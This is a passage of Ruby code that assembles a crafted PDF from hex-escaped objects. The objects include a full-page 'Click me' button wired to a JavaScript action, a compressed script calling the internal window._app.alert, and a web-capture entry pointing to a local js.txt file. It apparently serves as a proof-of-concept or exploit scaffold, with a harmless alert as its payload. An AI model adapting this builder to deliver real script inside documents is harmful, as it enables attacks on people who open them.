6e\x64\x73\x74\x72\x65\x61\x6d\xd") + add_object(34, "\xd\x3c\x3c\x2f\x43\x53\x20\x33\x36\x20\x30\x20\x52\x2f\x53\x2f\x54\x72\x61\x6e\x73\x70\x61\x72\x65\x6e\x63\x79\x3e\x3e\xd") + add_object(35, "\xd\x28\x1a\xca\x20\x4e\x2a\x5\x7b\x3\x0\xdd\xff\x1e\x62\x76\x26\xb3\x29\xd") + add_object(33, "\xd\x5b\x2f\x49\x43\x43\x42\x61\x73\x65\x64\x20\x32\x39\x20\x30\x20\x52\x5d\xd") + add_object(29, "\xd\x3c\x3c\x2f\x46\x69\x6c\x74\x65\x72\x2f\x46\x6c\x61\x74\x65\x44\x65\x63\x6f\x64\x65\x2f\x4c\x65\x6e\x67\x74\x68\x20\x32\x31\x36\x2f\x4e\x20\x31\x3e\x3e\x73\x74\x72\x65\x61\x6d\xd\x48\x89\x62\x60\x60\x9c\xe1\xe8\xe2\xe4\xca\x24\xc0\xc0\x90\x9b\x57\x52\xe4\x1e\xe4\x18\x19\x11\x19\xa5\xc0\x7e\x9e\x81\x8d\x81\x99\x1\xc\x12\x93\x8b\xb\x1c\x3\x2\x7c\x40\xec\xbc\xfc\xbc\x54\x6\xc\xf0\xed\x1a\x3\x23\x88\xbe\xac\xb\x32\xb\x53\x1e\x2f\x60\x4d\x2e\x28\x2a\x1\xd2\x7\x80\xd8\x28\x25\xb5\x38\x19\x48\x7f\x1\xe2\xcc\xf2\x92\x2\xa0\x38\x63\x2\x90\x2d\x92\x94\xd\x66\x83\xd4\x89\x64\x87\x4\x39\x3\xd9\x1d\x40\x36\x5f\x49\x6a\x5\x48\x8c\xc1\x39\xbf\xa0\xb2\x28\x33\x3d\xa3\x44\xc1\xd0\xd2\xd2\x52\xc1\x31\x25\x3f\x29\x55\x21\xb8\xb2\xb8\x24\x35\xb7\x58\xc1\x33\x2f\x39\xbf\xa8\x20\xbf\x28\xb1\x24\x35\x5\xa8\x16\x6a\x7\x8\xf0\xbb\x17\x25\x56\x2a\xb8\x27\xe6\xe6\x26\x2a\x18\xe9\x19\x91\xe8\x72\x22\x0\x28\x2c\x21\xac\xcf\x21\xe0\x30\x62\x14\x3b\x8f\x10\x43\x80\xe4\xd2\xa2\x32\x28\x93\x91\xc9\x98\x81\x1\x20\xc0\x0\x49\xc6\x38\x2f\xd\x65\x6e\x64\x73\x74\x72\x65\x61\x6d\xd") + add_object(36, "\xd\x5b\x2f\x49\x43\x43\x42\x61\x73\x65\x64\x20\x33\x30\x20\x30\x20\x52\x5d\xd") + add_object(30, "\xd\x3c\x3c\x2f\x41\x6c\x74\x65\x72\x6e\x61\x74\x65\x2f\x44\x65\x76\x69\x63\x65\x52\x47\x42\x2f\x46\x69\x6c\x74\x65\x72\x2f\x46\x6c\x61\x74\x65\x44\x65\x63\x6f\x64\x65\x2f\x4c\x65\x6e\x67\x74\x68\x20\x32\x35\x37\x34\x2f\x4e\x20\x33\x3e\x3e\x73\x74\x72\x65\x61\x6d\xd\x48\x89\x9c\x96\x79\x54\x53\x77\x16\xc7\x7f\x6f\xc9\x9e\x90\x95\xb0\xc3\x63\xd\x5b\x80\xb0\x6\x90\x35\x6c\x61\x91\x1d\x4\x51\x8\x49\x8\x1\x12\x42\x48\xd8\x5\x41\x44\x5\x14\x45\x44\x84\xaa\x95\x32\xd6\x6d\x74\x46\x4f\x45\x9d\x2e\xae\x63\xad\xe\xd6\x7d\xea\xd2\x3\xf5\x30\xea\xe8\x38\xb4\x16\xd7\x8e\x9d\x17\x38\x47\x9d\x4e\x67\xa6\xd3\xef\x1f\xef\xf7\x39\xf7\x77\xef\xef\xdd\xdf\xbd\xf7\x9d\xf3\x0\xa0\x27\xa5\xaa\xb5\xd5\x30\xb\x0\x8d\xd6\xa0\xcf\x4a\x8c\xc5\x16\x15\x14\x62\xa4\x9\x0\x3\xd\x20\x2\x11\x0\x32\x79\xad\x2e\x2d\x3b\x21\x7\xe0\x92\xc6\x4b\xb0\x5a\xdc\x9\xfc\x8b\x9e\x5e\x7\x90\x69\xbd\x22\x4c\xca\xc0\x30\xf0\xff\x89\x2d\xd7\xe9\xd\x0\x40\x19\x38\x7\x28\x94\xb5\x72\x9c\x3b\x71\xae\xaa\x37\xe8\x4c\xf6\x19\x9c\x79\xa5\x95\x26\x86\x51\x13\xeb\xf1\x4\x71\xb6\x34\xb1\x6a\x9e\xbd\xe7\x7c\xe6\x39\xda\xc4\xd\x8d\x56\x81\xb3\x29\x67\x9d\x42\xa3\x30\xf1\x69\x9c\x57\xd7\x19\x95\x38\x23\xa9\x38\x77\xd5\xa9\x95\xf5\x38\x5f\xc5\xd9\xa5\xca\xa8\x51\xe3\xfc\xdc\x14\xab\x51\xca\x6a\x1\x40\xe9\x26\xbb\x41\x29\x2f\xc7\xd9\xf\x67\xba\x3e\x27\x4b\x82\xf3\x2\x0\xc8\x74\xd5\x3b\x5c\xfa\xe\x1b\x94\xd\x6\xd3\xa5\x24\xd5\xba\x46\xbd\x5a\x55\x6e\xc0\xdc\xe5\x1e\x98\x28\x34\x54\x8c\x25\x29\xeb\xab\x94\x6\x83\x30\x43\x26\xaf\x94\xe9\x15\x98\xa4\x5a\xa3\x93\x69\x1b\x1\x98\xbf\xf3\x9c\x38\xa6\xda\x62\x78\x91\x83\x45\xa1\xc1\xc1\x42\x7f\x1f\xd1\x3b\x85\xfa\xaf\x9b\xbf\x50\xa6\xde\xce\xd3\x93\xcc\xb9\x9e\x41\xfc\xb\x6f\x6d\x3f\xe7\x57\x3d\xd\x80\x78\x16\xaf\xcd\xfa\xb7\xb6\xd2\x2d\x0\x8c\xaf\x4\xc0\xf2\xe6\x5b\x9b\xcb\xfb\x0\x30\xf1\xbe\x1d\xbe\xf8\xce\x7d\xf8\xa6\x79\x29\x37\x18\x74\x61\xbe\xbe\xf5\xf5\xf5\x3e\x6a\xa5\xdc\xc7\x54\xd0\x37\xfa\x9f\xe\xbf\x40\xef\xbc\xcf\xc7\x74\xdc\x9b\xf2\x60\x71\xca\x32\x99\xb1\xca\x80\x99\xea\x26\xaf\xae\xaa\x36\xea\xb1\x5a\x9d\x4c\xae\xc4\x84\x3f\x1d\xe2\x5f\x1d\xf8\xf3\x79\x78\x67\x29\xcb\x94\x7a\xa5\x16\x8f\xc8\xc3\xa7\x4c\xad\x55\xe1\xed\xd6\x2a\xd4\x6\x75\xb5\x16\x53\x6b\xff\x53\x13\x7f\x65\xd8\x4f\x34\x3f\xd7\xb8\xb8\x63\xaf\x1\xaf\xd8\x7\xb0\x2e\xf2\x0\xf2\xb7\xb\x0\xe5\xd2\x0\x52\xb4\xd\xdf\x81\xde\xf4\x2d\x95\x92\x7\x32\xf0\x35\xdf\xe1\xde\xfc\xdc\xcf\x9\xfa\xf7\x53\xe1\x3e\xd3\xa3\x56\xad\x9a\x8b\x93\x64\xe5\x60\x72\xa3\xbe\x6e\x7e\xcf\xf4\x59\x2\x2\xa0\x2\x26\xe0\x1\x2b\x60\xf\x9c\x81\x3b\x10\x2\x7f\x10\x2\xc2\x41\x34\x88\x7\xc9\x20\x1d\xe4\x80\x2\xb0\x14\xc8\x41\x39\xd0\x0\x3d\xa8\x7\x2d\xa0\x1d\x74\x81\x1e\xb0\x1e\x6c\x2\xc3\x60\x3b\x18\x3\xbb\xc1\x7e\x70\x10\x8c\x83\x8f\xc1\x9\xf0\x47\x70\x1e\x7c\x9\xae\x81\x5b\x60\x12\x4c\x83\x87\x60\x6\x3c\x5\xaf\x20\x8\x22\x41\xc\x88\xb\x59\x41\xe\x90\x2b\xe4\x5\xf9\x43\x62\x28\x12\x8a\x87\x52\xa1\x2c\xa8\x0\x2a\x81\x54\x90\x16\x32\x42\x2d\xd0\xd\xa8\x7\xea\x87\x86\xa1\x1d\xd0\x6e\xe8\xf7\xd0\x51\xe8\x4\x74\xe\xba\x4\x7d\x5\x4d\x41\xf\xa0\xef\xa0\x97\x30\x2\xd3\x61\x1e\x6c\x7\xbb\xc1\xbe\xb0\x18\x8e\x81\x53\xe0\x1c\x78\x9\xac\x82\x6b\xe0\x26\xb8\x13\x5e\x7\xf\xc1\xa3\xf0\x3e\xf8\x30\x7c\x2\x3e\xf\x5f\x83\x27\xe1\x87\xf0\x2c\x2\x10\x1a\xc2\x47\x1c\x11\x21\x22\x46\x24\x48\x3a\x52\x88\x94\x21\x7a\xa4\x15\xe9\x46\x6\x91\x51\x64\x3f\x72\xc\x39\x8b\x5c\x41\x26\x91\x47\xc8\xb\x94\x88\x72\x51\xc\x15\xa2\xe1\x68\x12\x9a\x8b\xca\xd1\x1a\xb4\x15\xed\x45\x87\xd1\x5d\xe8\x61\xf4\x34\x7a\x5\x9d\x42\x67\xd0\xd7\x4\x6\xc1\x96\xe0\x45\x8\x23\x48\x9\x8b\x8\x2a\x42\x3d\xa1\x8b\x30\x48\xd8\x49\xf8\x88\x70\x86\x70\x8d\x30\x4d\x78\x4a\x24\x12\xf9\x44\x1\x31\x84\x98\x44\x2c\x20\x56\x10\x9b\x89\xbd\xc4\xad\xc4\x3\xc4\xe3\xc4\x4b\xc4\xbb\xc4\x59\x12\x89\x64\x45\xf2\x22\x45\x90\xd2\x49\x32\x92\x81\xd4\x45\xda\x42\xda\x47\xfa\x8c\x74\x99\x34\x4d\x7a\x4e\xa6\x91\x1d\xc8\xfe\xe4\x4\x72\x21\x59\x4b\xee\x20\xf\x92\xf7\x90\x3f\x25\x5f\x26\xdf\x23\xbf\xa2\xb0\x28\xae\x94\x30\x4a\x3a\x45\x41\x69\xa4\xf4\x51\xc6\x28\xc7\x28\x17\x29\xd3\x94\x57\x54\x36\x55\x40\x8d\xa0\xe6\x50\x2b\xa8\xed\xd4\x21\xea\x7e\xea\x19\xea\x6d\xea\x13\x1a\x8d\xe6\x44\xb\xa5\x65\xd2\xd4\xb4\xe5\xb4\x21\xda\xef\x68\x9f\xd3\xa6\x68\x2f\xe8\x1c\xba\x27\x5d\x42\x2f\xa2\x1b\xe9\xeb\xe8\x1f\xd2\x8f\xd3\xbf\xa2\x3f\x61\x30\x18\x6e\x8c\x68\x46\x21\xc3\xc0\x58\xc7\xd8\xcd\x38\xc5\xf8\x9a\xf1\xdc\x8c\x6b\xe6\x63\x26\x35\x53\x98\xb5\x99\x8d\x98\x1d\x36\xbb\x6c\xf6\x98\x49\x61\xba\x32\x63\x98\x4b\x99\x4d\xcc\x41\xe6\x21\xe6\x45\xe6\x23\x16\x85\xe5\xc6\x92\xb0\x64\xac\x56\xd6\x8\xeb\x28\xeb\x6\x6b\x96\xcd\x65\x8b\xd8\xe9\x6c\xd\xbb\x97\xbd\x87\x7d\x8e\x7d\x9f\x43\xe2\xb8\x71\xe2\x39\xd\x4e\x27\xe7\x3\xce\x29\xce\x5d\x2e\xc2\x75\xe6\x4a\xb8\x72\xee\xd\xee\x18\xf7\xc\x77\x9a\x47\xe4\x9\x78\x52\x5e\x5\xaf\x87\xf7\x5b\xde\x4\x6f\xc6\x9c\x63\x1e\x68\x9e\x67\xde\x60\x3e\x62\xfe\x89\xf9\x24\x1f\xe1\xbb\xf1\xa5\xfc\x2a\x7e\x1f\xff\x20\xff\x3a\xff\xa5\x85\x9d\x45\x8c\x85\xd2\x62\x8d\xc5\x7e\x8b\xcb\x16\xcf\x2c\x6d\x2c\xa3\x2d\x95\x96\xdd\x96\x7\x2c\xaf\x59\xbe\xb4\xc2\xac\xe2\xad\x2a\xad\x36\x58\x8d\x5b\xdd\xb1\x46\xad\x3d\xad\x33\xad\xeb\xad\xb7\x59\x9f\xb1\x7e\x64\xc3\xb3\x9\xb7\x91\xdb\x74\xdb\x1c\xb4\xb9\x69\xb\xdb\x7a\xda\x66\xd9\x36\xdb\x7e\x60\x7b\xc1\x76\xd6\xce\xde\x2e\xd1\x4e\x67\xb7\xc5\xee\x94\xdd\x23\x7b\xbe\x7d\xb4\x7d\x85\xfd\x80\xfd\xa7\xf6\xf\x1c\xb8\xe\x91\xe\x6a\x87\x1\x87\xcf\x1c\xfe\x8a\x99\x63\x31\x58\x15\x36\x84\x9d\xc6\x66\x1c\x6d\x1d\x93\x1c\x8d\x8e\x3b\x1c\x27\x1c\x5f\x39\x9\x9c\x72\x9d\x3a\x9c\xe\x38\xdd\x71\xa6\x3a\x8b\x9d\xcb\x9c\x7\x9c\x4f\x3a\xcf\xb8\x38\xb8\xa4\xb9\xb4\xb8\xec\x75\xb9\xe9\x4a\x71\x15\xbb\x96\xbb\x6e\x76\x3d\xeb\xfa\xcc\x4d\xe0\x96\xef\xb6\xca\x6d\xdc\xed\xbe\xc0\x52\x20\x15\x34\x9\xf6\xd\x6e\xbb\x33\xdc\xa3\xdc\x6b\xdc\x47\xdd\xaf\x7a\x10\x3d\xc4\x1e\x95\x1e\x5b\x3d\xbe\xf4\x84\x3d\x83\x3c\xcb\x3d\x47\x3c\x2f\x7a\xc1\x5e\xc1\x5e\x6a\xaf\xad\x5e\x97\xbc\x9\xde\xa1\xde\x5a\xef\x51\xef\x1b\x42\xba\x30\x46\x58\x27\xdc\x2b\x9c\xf2\xe1\xfb\xa4\xfa\x74\xf8\x8c\xfb\x3c\xf6\x75\xf1\x2d\xf4\xdd\xe0\x7b\xd6\xf7\xb5\x5f\x90\x5f\x95\xdf\x98\xdf\x2d\x11\x47\x94\x2c\xea\x10\x1d\x13\x7d\xe7\xef\xe9\x2f\xf7\x1f\xf1\xbf\x1a\xc0\x8\x48\x8\x68\xb\x38\x12\xf0\x6d\xa0\x57\xa0\x32\x70\x5b\xe0\x9f\x83\xb8\x41\x69\x41\xab\x82\x4e\x6\xfd\x23\x38\x24\x58\x1f\xbc\x3f\xf8\x41\x88\x4b\x48\x49\xc8\x7b\x21\x37\xc4\x3c\x71\x86\xb8\x57\xfc\x79\x28\x21\x34\x36\xb4\x2d\xf4\xe3\xd0\x17\x61\xc1\x61\x86\xb0\x83\x61\x7f\xf\x17\x86\x57\x86\xef\x9\xbf\xbf\x40\xb0\x40\xb9\x60\x6c\xc1\xdd\x8\xa7\x8\x59\xc4\x8e\x88\xc9\x48\x2c\xb2\x24\xf2\xfd\xc8\xc9\x28\xc7\x28\x59\xd4\x68\xd4\x37\xd1\xce\xd1\x8a\xe8\x9d\xd1\xf7\x62\x3c\x62\x2a\x62\xf6\xc5\x3c\x8e\xf5\x8b\xd5\xc7\x7e\x14\xfb\x4c\x12\x26\x59\x26\x39\x1e\x87\xc4\x25\xc6\x75\xc7\x4d\xc4\x73\xe2\x73\xe3\x87\xe3\xbf\x4e\x70\x4a\x50\x25\xec\x4d\x98\x49\xc\x4a\x6c\x4e\x3c\x9e\x44\x48\x4a\x49\xda\x90\x74\x43\x6a\x27\x95\x4b\x77\x4b\x67\x92\x43\x92\x97\x25\x9f\x4e\xa1\xa7\x64\xa7\xc\xa7\x7c\x93\xea\x99\xaa\x4f\x3d\x96\x6\xa7\x25\xa7\x6d\x4c\xbb\xbd\xd0\x75\xa1\x76\xe1\x78\x3a\x48\x97\xa6\x6f\x4c\xbf\x93\x21\xc8\xa8\xc9\xf8\x43\x26\x31\x33\x23\x73\x24\xf3\x2f\x59\xa2\xac\x96\xac\xb3\xd9\xdc\xec\xe2\xec\x3d\xd9\x4f\x73\x62\x73\xfa\x72\x6e\xe5\xba\xe7\x1a\x73\x4f\xe6\x31\xf3\x8a\xf2\x76\xe7\x3d\xcb\x8f\xcb\xef\xcf\x9f\x5c\xe4\xbb\x68\xd9\xa2\xf3\x5\xd6\x5\xea\x82\x23\x85\xa4\xc2\xbc\xc2\x9d\x85\xb3\x8b\xe3\x17\x6f\x5a\x3c\x5d\x14\x54\xd4\x55\x74\x7d\x89\x60\x49\xc3\x92\x73\x4b\xad\x97\x56\x2d\xfd\xa4\x98\x59\x2c\x2b\x3e\x54\x42\x28\xc9\x2f\xd9\x53\xf2\x83\x2c\x5d\x36\x2a\x9b\x2d\x95\x96\xbe\x57\x3a\x23\x97\xc8\x37\xcb\x1f\x2a\xa2\x15\x3\x8a\x7\xca\x8\x65\xbf\xf2\x5e\x59\x44\x59\x7f\xd9\x7d\x55\x84\x6a\xa3\xea\x41\x79\x54\xf9\x60\xf9\x23\xb5\x44\x3d\xac\xfe\xb6\x22\xa9\x62\x7b\xc5\xb3\xca\xf4\xca\xf\x2b\x7f\xac\xca\xaf\x3a\xa0\x21\x6b\x4a\x34\x47\xb5\x1c\x6d\xa5\xf6\x74\xb5\x7d\x75\x43\xf5\x25\x9d\x97\xae\x4b\x37\x59\x13\x56\xb3\xa9\x66\x46\x9f\xa2\xdf\x59\xb\xd5\x2e\xa9\x3d\x62\xe0\xe1\x3f\x53\x17\x8c\xee\xc6\x95\xc6\xa9\xba\xc8\xba\x91\xba\xe7\xf5\x79\xf5\x87\x1a\xd8\xd\xda\x86\xb\x8d\x9e\x8d\x6b\x1a\xef\x35\x25\x34\xfd\xa6\x19\x6d\x96\x37\x9f\x6c\x71\x6c\x69\x6f\x99\x5a\x16\xb3\x6c\x47\x2b\xd4\x5a\xda\x7a\xb2\xcd\xb9\xad\xb3\x6d\x7a\x79\xe2\xf2\x5d\xed\xd4\xf6\xca\xf6\x3f\x75\xf8\x75\xf4\x77\x7c\xbf\x22\x7f\xc5\xb1\x4e\xbb\xce\xe5\x9d\x77\x57\x26\xae\xdc\xdb\x65\xd6\xa5\xef\xba\xb1\x2a\x7c\xd5\xf6\xd5\xe8\x6a\xf5\xea\x89\x35\x1\x6b\xb6\xac\x79\xdd\xad\xe8\xfe\xa2\xc7\xaf\x67\xb0\xe7\x87\x5e\x79\xef\x17\x6b\x45\x6b\x87\xd6\xfe\xb8\xae\x6c\xdd\x44\x5f\x70\xdf\xb6\xf5\xc4\xf5\xda\xf5\xd7\x37\x44\x6d\xd8\xd5\xcf\xee\x6f\xea\xbf\xbb\x31\x6d\xe3\xe1\x1\x6c\xa0\x7b\xe0\xfb\x4d\xc5\x9b\xce\xd\x6\xe\x6e\xdf\x4c\xdd\x6c\xdc\x3c\x39\x94\xfa\x4f\x0\xa4\x1\x5b\xfe\x98\xb8\x99\x24\x99\x90\x99\xfc\x9a\x68\x9a\xd5\x9b\x42\x9b\xaf\x9c\x1c\x9c\x89\x9c\xf7\x9d\x64\x9d\xd2\x9e\x40\x9e\xae\x9f\x1d\x9f\x8b\x9f\xfa\xa0\x69\xa0\xd8\xa1\x47\xa1\xb6\xa2\x26\xa2\x96\xa3\x6\xa3\x76\xa3\xe6\xa4\x56\xa4\xc7\xa5\x38\xa5\xa9\xa6\x1a\xa6\x8b\xa6\xfd\xa7\x6e\xa7\xe0\xa8\x52\xa8\xc4\xa9\x37\xa9\xa9\xaa\x1c\xaa\x8f\xab\x2\xab\x75\xab\xe9\xac\x5c\xac\xd0\xad\x44\xad\xb8\xae\x2d\xae\xa1\xaf\x16\xaf\x8b\xb0\x0\xb0\x75\xb0\xea\xb1\x60\xb1\xd6\xb2\x4b\xb2\xc2\xb3\x38\xb3\xae\xb4\x25\xb4\x9c\xb5\x13\xb5\x8a\xb6\x1\xb6\x79\xb6\xf0\xb7\x68\xb7\xe0\xb8\x59\xb8\xd1\xb9\x4a\xb9\xc2\xba\x3b\xba\xb5\xbb\x2e\xbb\xa7\xbc\x21\xbc\x9b\xbd\x15\xbd\x8f\xbe\xd\xbe\x84\xbe\xff\xbf\x7a\xbf\xf5\xc0\x70\xc0\xec\xc1\x67\xc1\xe3\xc2\x5f\xc2\xdb\xc3\x58\xc3\xd4\xc4\x51\xc4\xce\xc5\x4b\xc5\xc8\xc6\x46\xc6\xc3\xc7\x41\xc7\xbf\xc8\x3d\xc8\xbc\xc9\x3a\xc9\xb9\xca\x38\xca\xb7\xcb\x36\xcb\xb6\xcc\x35\xcc\xb5\xcd\x35\xcd\xb5\xce\x36\xce\xb6\xcf\x37\xcf\xb8\xd0\x39\xd0\xba\xd1\x3c\xd1\xbe\xd2\x3f\xd2\xc1\xd3\x44\xd3\xc6\xd4\x49\xd4\xcb\xd5\x4e\xd5\xd1\xd6\x55\xd6\xd8\xd7\x5c\xd7\xe0\xd8\x64\xd8\xe8\xd9\x6c\xd9\xf1\xda\x76\xda\xfb\xdb\x80\xdc\x5\xdc\x8a\xdd\x10\xdd\x96\xde\x1c\xde\xa2\xdf\x29\xdf\xaf\xe0\x36\xe0\xbd\xe1\x44\xe1\xcc\xe2\x53\xe2\xdb\xe3\x63\xe3\xeb\xe4\x73\xe4\xfc\xe5\x84\xe6\xd\xe6\x96\xe7\x1f\xe7\xa9\xe8\x32\xe8\xbc\xe9\x46\xe9\xd0\xea\x5b\xea\xe5\xeb\x70\xeb\xfb\xec\x86\xed\x11\xed\x9c\xee\x28\xee\xb4\xef\x40\xef\xcc\xf0\x58\xf0\xe5\xf1\x72\xf1\xff\xf2\x8c\xf3\x19\xf3\xa7\xf4\x34\xf4\xc2\xf5\x50\xf5\xde\xf6\x6d\xf6\xfb\xf7\x8a\xf8\x19\xf8\xa8\xf9\x38\xf9\xc7\xfa\x57\xfa\xe7\xfb\x77\xfc\x7\xfc\x98\xfd\x29\xfd\xba\xfe\x4b\xfe\xdc\xff\x6d\xff\xff\x2\xc\x0\xf7\x84\xf3\xfb\xd\x65\x6e\x64\x73\x74\x72\x65\x61\x6d\xd") + add_object(38, "\xd\x3c\x3c\x2f\x41\x20\x34\x33\x20\x30\x20\x52\x2f\x41\x50\x3c\x3c\x2f\x4e\x20\x35\x31\x20\x30\x20\x52\x3e\x3e\x2f\x44\x41\x28\x2f\x48\x65\x42\x6f\x20\x31\x32\x20\x54\x66\x20\x30\x20\x67\x29\x2f\x46\x20\x34\x2f\x46\x54\x2f\x42\x74\x6e\x2f\x46\x66\x20\x36\x35\x35\x33\x36\x2f\x4d\x4b\x3c\x3c\x2f\x42\x47\x5b\x31\x2e\x30\x20\x31\x2e\x30\x20\x31\x2e\x30\x5d\x2f\x43\x41\x28\x43\x6c\x69\x63\x6b\x20\x6d\x65\x29\x2f\x54\x50\x20\x31\x3e\x3e\x2f\x50\x20\x32\x36\x20\x30\x20\x52\x2f\x52\x65\x63\x74\x5b\x30\x2e\x30\x20\x30\x2e\x36\x31\x34\x38\x36\x38\x20\x36\x31\x31\x2e\x33\x38\x34\x20\x37\x39\x32\x2e\x30\x5d\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x57\x69\x64\x67\x65\x74\x2f\x54\x28\x62\x74\x6e\x43\x6c\x69\x63\x6b\x4d\x65\x29\x2f\x54\x55\x28\x43\x6c\x69\x63\x6b\x20\x6d\x65\x29\x2f\x54\x79\x70\x65\x2f\x41\x6e\x6e\x6f\x74\x3e\x3e\xd") + add_object(43, "\xd\x3c\x3c\x2f\x4a\x53\x20\x34\x36\x20\x30\x20\x52\x2f\x53\x2f\x4a\x61\x76\x61\x53\x63\x72\x69\x70\x74\x3e\x3e\xd") + add_object(51, "\xd\x3c\x3c\x2f\x42\x42\x6f\x78\x5b\x30\x2e\x30\x20\x30\x2e\x30\x20\x36\x31\x31\x2e\x33\x38\x34\x20\x37\x39\x31\x2e\x33\x38\x35\x5d\x2f\x46\x6f\x72\x6d\x54\x79\x70\x65\x20\x31\x2f\x4c\x65\x6e\x67\x74\x68\x20\x36\x34\x2f\x4d\x61\x74\x72\x69\x78\x5b\x31\x2e\x30\x20\x30\x2e\x30\x20\x30\x2e\x30\x20\x31\x2e\x30\x20\x30\x2e\x30\x20\x30\x2e\x30\x5d\x2f\x52\x65\x73\x6f\x75\x72\x63\x65\x73\x3c\x3c\x2f\x50\x72\x6f\x63\x53\x65\x74\x5b\x2f\x50\x44\x46\x5d\x3e\x3e\x2f\x53\x75\x62\x74\x79\x70\x65\x2f\x46\x6f\x72\x6d\x2f\x54\x79\x70\x65\x2f\x58\x4f\x62\x6a\x65\x63\x74\x3e\x3e\x73\x74\x72\x65\x61\x6d\xd\x31\x20\x67\xd\x30\x20\x30\x20\x36\x31\x31\x2e\x33\x38\x33\x38\x20\x37\x39\x31\x2e\x33\x38\x35\x31\x20\x72\x65\xd\x66\xd\x71\xd\x31\x20\x31\x20\x36\x30\x39\x2e\x33\x38\x33\x38\x20\x37\x38\x39\x2e\x33\x38\x35\x31\x20\x72\x65\xd\x57\xd\x6e\xd\x51\xd\x65\x6e\x64\x73\x74\x72\x65\x61\x6d\xd") + # add_object(46, "\xd\x3c\x3c\x2f\x46\x69\x6c\x74\x65\x72\x5b\x2f\x46\x6c\x61\x74\x65\x44\x65\x63\x6f\x64\x65\x5d\x2f\x4c\x65\x6e\x67\x74\x68\x20\x33\x30\x32\x3e\x3e\x73\x74\x72\x65\x61\x6d\xd\x48\x89\x84\x91\x4d\x4f\xc3\x30\xc\x86\xef\x95\xfa\x1f\xac\x5d\x92\x6a\x25\x41\xe2\x38\xc1\x85\x2b\x70\xe0\xca\x10\x4a\x13\xaf\xd\x34\x49\x95\xba\xfb\x10\xda\x7f\x27\x5d\xe9\x18\x12\x12\x3e\x58\x4e\xe2\xf7\xf5\x23\x67\x33\x78\x4d\x36\x78\xc0\x3d\xea\x81\x90\x57\xd1\x9a\x1a\x4b\xd0\xce\x14\xf0\x99\x67\x90\x22\x22\xd\xd1\xc3\xf4\x24\x6a\xa4\xfb\x56\xf5\x3d\x2f\xc4\x26\xc4\x27\xe5\x90\xb3\x77\xb5\x55\xa2\x55\xbe\x16\xcf\x83\x27\xeb\x90\x15\x93\x74\x8c\x51\xf1\x88\xd4\x4\xc3\x59\x2a\xe7\x8e\xd2\xf\x6d\x5b\x8\xeb\xb7\xe1\x3\xf9\x78\xf8\xbe\x19\x51\xf8\x38\x7f\x95\x67\xc7\x3c\xcb\x33\xbb\xe1\x3b\xeb\x4d\xd8\x89\x37\xd5\x75\x67\x2c\x8a\x87\xb1\x94\x72\x1e\xb4\x55\x11\x3a\x45\xd\xdc\x2\x93\xce\x93\xec\x8d\x56\xd1\x48\x17\x2a\xdb\x62\x44\x65\x30\x8a\x2e\x68\x41\x7b\x62\xab\x1f\xc0\x5f\x3a\xa3\x48\x4d\x49\x7\x27\x94\x9\x15\x8a\x49\xfa\xaf\xcf\xbc\xc3\xb\xd8\x12\x5e\x98\xec\xf\x3d\xa1\x93\x95\xf5\xb2\x6f\x58\xc9\xae\x74\x4a\xa8\x9b\x0\xeb\xc5\x43\x88\xe8\xc0\x76\xfd\xe0\xd6\xb\xb8\x3\x6\xcb\x13\xcb\x6b\x71\x61\x7c\x61\x28\x54\x22\x20\x7e\xc2\x5d\xa6\x6e\x9d\x70\x8\xd\x2b\xe1\x66\x56\x1c\x41\x2b\xd2\xd\xc7\xf3\xa6\xfe\xf6\x48\xbf\x7c\x7d\xd6\xa4\x55\x7f\x9\x30\x0\x67\xa5\x9f\x47\xd\x65\x6e\x64\x73\x74\x72\x65\x61\x6d\xd") + + js = Zlib::Deflate.deflate("window._app.alert('HELLO WORLD', 3);") + add_object(46, "\x0d<</Filter[/FlateDecode]/Length 302>>stream\x0d#{js}\x0dendstream\x0d") + + + add_object(8, "\xd\x3c\x3c\x2f\x43\x6f\x75\x6e\x74\x20\x31\x2f\x46\x69\x72\x73\x74\x20\x39\x20\x30\x20\x52\x2f\x4c\x61\x73\x74\x20\x39\x20\x30\x20\x52\x2f\x50\x61\x72\x65\x6e\x74\x20\x37\x20\x30\x20\x52\x2f\x54\x69\x74\x6c\x65\x28\x4c\x6f\x63\x61\x6c\x20\x44\x69\x73\x6b\x29\x3e\x3e\xd") + add_object(9, "\xd\x3c\x3c\x2f\x44\x65\x73\x74\x5b\x32\x36\x20\x30\x20\x52\x2f\x58\x59\x5a\x20\x30\x20\x37\x39\x32\x20\x6e\x75\x6c\x6c\x5d\x2f\x50\x61\x72\x65\x6e\x74\x20\x38\x20\x30\x20\x52\x2f\x53\x45\x20\x31\x35\x20\x30\x20\x52\x2f\x54\x69\x74\x6c\x65\x28\xfe\xff\x0\x6a\x0\x73\x0\x2e\x0\x74\x0\x78\x0\x74\x29\x3e\x3e\xd") + add_object(17, "\xd\x3c\x3c\x2f\x4e\x61\x6d\x65\x73\x5b\x33\x35\x20\x30\x20\x52\x20\x32\x30\x20\x30\x20\x52\x5d\x3e\x3e\xd") + add_object(18, "\xd\x3c\x3c\x2f\x4e\x61\x6d\x65\x73\x5b\x31\x39\x20\x30\x20\x52\x20\x32\x30\x20\x30\x20\x52\x5d\x3e\x3e\xd") + add_object(19, "\xd\x28\x66\x69\x6c\x65\x3a\x2f\x2f\x2f\x43\x7c\x2f\x74\x65\x6d\x70\x2f\x6a\x73\x2e\x74\x78\x74\x29\xd") + add_object(20, "\xd\x3c\x3c\x2f\x43\x54\x28\x74\x65\x78\x74\x2f\x70\x6c\x61\x69\x6e\x29\x2f\x49\x44\x20\x33\x35\x20\x30\x20\x52\x2f\x4f\x5b\x32\x36\x20\x30\x20\x52\x5d\x2f\x53\x2f\x53\x50\x53\x2f\x53\x49\x20\x32\x31\x20\x30\x20\x52\x2f\x54\x28\xfe\xff\x0\x6a\x0\x73\x0\x2e\x0\x74\x0\x78\x0\x74\x29\x2f\x54\x53\x28\x44\x3a\x32\x30\x31\x34\x30\x33\x33\x31\x31\x31\x33\x35\x35\x32\x5a\x29\x3e\x3e\xd") + add_object(21, "\xd\x3c\x3c\x2f\x41\x55\x20\x31\x39\x20\x30\x20\x52\x2f\x54\x53\x28\x44\x3a\x32\x30\x31\x34\x30\x33\x33\x31\x31\x31\x33\x35\x35\x32\x5a\x29\x3e\x3e\xd") + add_object(39, 